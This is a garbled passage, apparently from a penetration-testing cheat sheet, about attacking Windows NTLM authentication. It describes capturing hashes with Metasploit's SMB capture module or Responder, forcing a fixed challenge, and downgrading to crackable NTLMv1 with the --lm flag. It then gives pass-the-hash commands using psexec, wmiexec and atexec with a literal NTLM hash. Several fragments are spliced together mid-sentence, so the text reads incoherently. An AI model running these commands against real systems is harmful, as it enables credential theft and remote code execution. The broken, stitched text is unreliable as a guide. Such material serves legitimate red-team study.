metasploit auxiliary/server/capture/smb
or responder
you can set the authentication challenge to 1122334455667788, capture the authentication attempt, and if it was done using NTLMv1 you will be able to crack it.
If you are using responder
you could try to **use the flag --lm
** to try to downgrade the authentication.
Note that for this technique the authentication must be performed using NTLMv1 (NTLMv2 is not valid).runas /netonly
trick but you don't need to know the plain-text password).C:\AD\MyTools\psexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" [email protected]
wmiexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" [email protected]
C:\AD\MyTools\atexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" [email protected] 'whoami'